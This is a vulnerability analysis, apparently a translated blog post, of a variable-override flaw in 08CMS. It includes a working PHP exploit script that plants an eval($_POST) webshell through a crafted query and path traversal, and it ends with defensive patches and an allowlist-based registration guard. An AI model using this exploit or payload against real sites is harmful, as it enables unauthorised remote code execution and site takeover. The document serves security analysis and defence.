08CMS Variable Override: Write an Arbitrary Webshell to an Arbitrary Path

Source: Internet
Author: User

Directory

1. Vulnerability Description
2. Vulnerability Trigger Condition
3. Vulnerability Impact Range
4. Vulnerability Code Analysis
5. Defense Methods
6. Defensive Thinking

1. Vulnerability description

A brief description of the vulnerability

1. /include/general.inc.php

```php
// local variable registration
foreach (array('_POST', '_GET') as $_request) {
    foreach ($$_request as $k => $v) {
        $k{0} != '_' && $$k = maddslashes($v);
    }
}
/* A simulated GPC (register_globals) function is implemented here: it registers the
   variables in the GET and POST data entered by the user into the local code space,
   so an attacker can, in theory, "inject" any variable value into the application. */
```

2. With local variable overrides, the attacker can control the write-file operation the target application performs and write arbitrary files to any location under the site directory.


2. Vulnerability Trigger Condition

0x1: Attack flow

1. Upload a non-php file that contains the webshell. The relevant code in /tools/ptool.php:

```php
$cf = M_ROOT . './dynamic/stats/aclicks.cac';
$ct = M_ROOT . './dynamic/stats/aclicks_time.cac';
if (@$fp = fopen($cf, 'a')) {
    fwrite($fp, "$aid");
    fclose($fp);
}
```

   By injecting $aid through the program's local variable override vulnerability, the webshell code is written to /dynamic/stats/aclicks.cac:

   $exp = /tools/ptool.php?aid=<?php eval($_POST[a]);?>

2. /index.php?tplname=../../dynamic/stats/aclicks.cac

3. The program opens /dynamic/stats/aclicks.cac and re-writes it to /dynamic/stats/aclicks.cac.php, completing the getshell.

0x2: PoC

```php
<?php
/*
exp: index.php?tplname=../../dynamic/stats/aclicks.cac
Auto cms shell:     /dynamic/tplcache/common/....dynamicstatsaclicks.cac.php
decorate CMS shell: /dynamic/dynamic/stats/aclicks.cac.php
*/
// $exp  = /tools/ptool.php?aid=<?php eval($_POST[a]);?>
$exp  = '/tools/ptool.php?aid=%3c%3fphp%20eval%28%24_POST%5ba%5d%29%3b%3f%3e';
// $exp1 = /index.php?tplname=../../dynamic/stats/aclicks.cac
$exp1 = '/index.php?tplname=..%2f..%2fdynamic%2fstats%2faclicks.cac';

if ($argc < 2) {
    print_r('
+---------------------------------------------------------------------------+
 [+] php ' . $argv[0] . '    www.08sec.com
+---------------------------------------------------------------------------+
');
    exit;
}
error_reporting(E_ERROR);
set_time_limit(0);
$host = $argv[1];
go($host);

function go($host) {
    global $exp, $exp1;
    $re = send($host, $exp);
    // retry once if the response contains a MySQL error
    stripos($re, "MySQL") > 0 ? send($host, $exp) : "";
    $re = send($host, $exp1);
    stripos($re, "aclicks.cac") > 0
        ? exit("+ Exploit Success!\r\n + http://$host/template/dynamic/stats/aclicks.cac.php\r\n")
        : exit("- Exploit Failed!\n");
}

function send($host, $url) {
    $data  = "GET $url HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98) Opera 6.03 [en]\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Accept-Language: en-us\r\n";
    $data .= "Connection: close\r\n\r\n";
    $fp = @fsockopen($host, 80);
    if (!$fp) {
        die("[-] Connect to host Error\r\n");
    }
    fwrite($fp, $data);
    $back = '';
    while (!feof($fp)) {
        $back .= fread($fp, 1024);
    }
    fclose($fp);
    return $back;
}
?>
```

Relevant Link:

http://www.unhonker.com/bug/1390.html


3. Vulnerability Impact Range

08CMS All Commercial Editions


4. Vulnerability Code Analysis

Local variable registration implementation code

/include/general.inc.php

/index.php

```php
include_once dirname(__FILE__) . '/include/general.inc.php';
include_once M_ROOT . './include/common.fun.php';
if_siteclosed();
mobile_open() || message('Mobile version is not yet open');
/*
function un_virtual($str) {
    ...
    // replace / and - with & and =
    $str = str_replace(array('/', '-'), array('&', '='), $str);
    ...
    return $str;
}
parse_str() parses the query string into variables, stored in the array $temparr
*/
parse_str(un_virtual($_SERVER['QUERY_STRING']), $temparr);
...
$_da = array();
if (!$cnstr) {
    // $tplname is defined here, which is equivalent to being initialised
    $tplname = $_ismobile ? $o_index_tpl : $hometpl;
    $_da['rss'] = $cms_abs . 'rss.php';
    $_da += $temparr;     // $_da = $_da + $temparr
    unset($temparr);      // destroy the variable
    // variable override: this lets us control $tplname, i.e. overwrite it again
    extract($_da, EXTR_OVERWRITE);
    // this tpl_refresh() call is the key point of the exploit
    tpl_refresh($tplname);
    ...
```

/include/refresh.fun.php

```php
function tpl_refresh($tplname) {
    global $templatedir, $debugtag;
    $tdir = M_ROOT . "template/$templatedir/";
    // $tplname can be controlled by an attacker, so $cacf is effectively attacker-controlled too
    $cacf = $tdir . 'pcache/' . $tplname . '.php';
    if (file_exists($x = $tdir . "function/utags.fun.php")) {
        include_once $x;
    }
    mmkdir($cacf, 0, 1);
    if ($debugtag || !file_exists($cacf)) {
        // open the file and return its content
        $str = load_tpl($tplname);
        // file2str is the function that opens the file
        $tpl = @file2str(M_ROOT . "template/$templatedir/" . $tplname);
        $rt && $tpl = preg_replace("/{tpl\$(.+?)}/ies", "rtagval('\\1', '$rt')", $tpl);
        // filter
        $str = preg_replace("/<\?(?!php\s|=|\s)/i", '<?=\'<?\'?>', $str);
        $str = preg_replace("/<!--{(.+?)}-->/s", "{\\1}", $str);
        breplace($str, '');
        nreplace($str);
        quit_refresh_var();
        $str = tpl_basecode($str);
        /* The key to the vulnerability is here:
           1. $str: an attacker can control the contents of the .cac file, because the
              content is written through another overridable variable ($aid), which lets
              the attacker place webshell code in the .cac file.
           2. $cacf: the attacker-supplied parameter can be the path of a non-php file
              (the .cac file); that file really exists, since it can be populated through
              the other variable, and the program appends ".php" at the end, so the write
              effectively renames the .cac file to a .php file. */
        str2file($str, $cacf);
    }
    unset($str, $tdir, $cacf);
}
```


5. Defense Methods

/index.php

```php
if (!$cnstr) {
    // $tplname is defined here, which is equivalent to being initialised
    $tplname = $_ismobile ? $o_index_tpl : $hometpl;
    $_da['rss'] = $cms_abs . 'rss.php';
    $_da += $temparr;     // $_da = $_da + $temparr
    unset($temparr);      // destroy the variable
    /* if the variable already exists, no overwrite operation is performed */
    extract($_da, EXTR_SKIP);
    tpl_refresh($tplname);
    ...
```
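As an added example (not 08CMS code), the script below contrasts the EXTR_OVERWRITE behaviour that lets a query-string key clobber $tplname with the EXTR_SKIP fix above, and adds the second check that tpl_refresh() lacks: validating the template name before it is turned into a cache path. The variable $hometpl, the function names resolve_tplname_vulnerable(), resolve_tplname_fixed() and safe_cache_path(), the temporary directory and the constructed query string are assumptions for the demo.

```php
<?php
// Added example, not 08CMS code. Demonstrates:
//   1. extract(..., EXTR_OVERWRITE) vs extract(..., EXTR_SKIP) for a pre-initialised $tplname
//   2. a name/path check that keeps the cache file inside the template directory
// $hometpl, the function names and the query string are assumptions for this demo.

$hometpl = 'index.htm';

// Constructed query string in the shape the attack used (../../ traversal).
parse_str('tplname=..%2f..%2fdynamic%2fstats%2faclicks.cac&foo=bar', $temparr);

function resolve_tplname_vulnerable(array $temparr, $hometpl) {
    $tplname = $hometpl;            // "initialised" here...
    $_da = array();
    $_da += $temparr;
    extract($_da, EXTR_OVERWRITE);  // ...and silently replaced by the request key
    return $tplname;
}

function resolve_tplname_fixed(array $temparr, $hometpl) {
    $tplname = $hometpl;
    $_da = array();
    $_da += $temparr;
    extract($_da, EXTR_SKIP);       // the existing $tplname wins; the request key is dropped
    return $tplname;
}

// Second line of defence for tpl_refresh(): even if $tplname were attacker-controlled,
// the cache path must be a plain file name and must resolve inside pcache/.
function safe_cache_path($tdir, $tplname) {
    // allow only [A-Za-z0-9_.-], no leading dot, no path separators, no ".."
    if (!preg_match('/^[A-Za-z0-9_][A-Za-z0-9_.-]*$/', $tplname) || strpos($tplname, '..') !== false) {
        return false;
    }
    $cacheDir = rtrim($tdir, '/') . '/pcache';
    $target   = $cacheDir . '/' . $tplname . '.php';
    // the directory that will receive the write must be exactly the cache directory
    $realCacheDir  = realpath($cacheDir);
    $realTargetDir = realpath(dirname($target));
    if ($realCacheDir === false || $realTargetDir !== $realCacheDir) {
        return false;
    }
    return $target;
}

echo "vulnerable: ", resolve_tplname_vulnerable($temparr, $hometpl), "\n"; // ../../dynamic/stats/aclicks.cac
echo "fixed:      ", resolve_tplname_fixed($temparr, $hometpl), "\n";      // index.htm

// constructed template directory so realpath() has something to resolve
$tdir = sys_get_temp_dir() . '/tpl_demo';
@mkdir($tdir . '/pcache', 0700, true);
var_dump(safe_cache_path($tdir, 'index.htm'));                       // string: .../pcache/index.htm.php
var_dump(safe_cache_path($tdir, '../../dynamic/stats/aclicks.cac')); // bool(false)
```

EXTR_SKIP alone only protects variables the application has already assigned before the extract() call; any name that is first introduced by extract() is still request-controlled, which is why the path check is kept as an independent guard at the point where the file is written.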


6. Defensive Thinking

Defensive ideas against variable override

1. Re-run the original code logic and assign the overridden variable back to its original value.
2. Detect keywords at the entrance of local variable registration.
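As an added example (not 08CMS code), the following function is a guarded replacement for the registration loop from /include/general.inc.php that applies both ideas above at the entrance: it registers only names from an explicit allowlist, refuses any name that the application has already initialised (the override the exploit relied on) so the original value is preserved, and records every rejected key so the attempt is visible in logs. The function name register_request_vars(), the allowlist and the constructed request arrays are assumptions; the caller is expected to import the sanctioned values with extract($scope, EXTR_SKIP).

```php
<?php
// Added example, not 08CMS code: a guarded variant of the GET/POST registration loop.
// register_request_vars(), the allowlist and the sample request arrays are assumptions.
function register_request_vars(array $sources, array $allowlist, array &$scope, array &$rejected) {
    foreach ($sources as $name => $values) {          // e.g. '_GET' => $_GET
        foreach ($values as $k => $v) {
            // same rule as the original loop: never register names starting with '_'
            if (!is_string($k) || $k === '' || $k[0] === '_') {
                $rejected[] = "$name:$k (reserved prefix)";
                continue;
            }
            // keyword detection at the entrance: only explicitly allowed names pass
            if (!in_array($k, $allowlist, true)) {
                $rejected[] = "$name:$k (not in allowlist)";
                continue;
            }
            // the application initialised this variable before registration; overriding it
            // is exactly what the exploit depends on, so keep the original value and log it
            if (array_key_exists($k, $scope)) {
                $rejected[] = "$name:$k (would override existing value " . var_export($scope[$k], true) . ")";
                continue;
            }
            $scope[$k] = is_string($v) ? addslashes($v) : $v;
        }
    }
}

// --- constructed demo input ---
$get   = array('tplname' => '../../dynamic/stats/aclicks.cac', 'page' => '2', 'aid' => '99');
$post  = array('_config' => 'x');
$scope = array('tplname' => 'index.htm', 'aid' => '7');   // values the application already set
$allow = array('page', 'aid');
$rejected = array();

register_request_vars(array('_GET' => $get, '_POST' => $post), $allow, $scope, $rejected);

print_r($scope);     // tplname => index.htm, aid => 7, page => 2
print_r($rejected);  // _GET:tplname (not in allowlist), _GET:aid (would override ...), _POST:_config (reserved prefix)

// the caller then imports only the sanctioned values without clobbering anything:
extract($scope, EXTR_SKIP);
```

The $rejected list is the detection hook: a request that tries to set tplname, or to override an already-initialised aid, shows up there and can be forwarded to the application log or a WAF rule instead of silently succeeding.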

Copyright (c) Littlehann All rights reserved
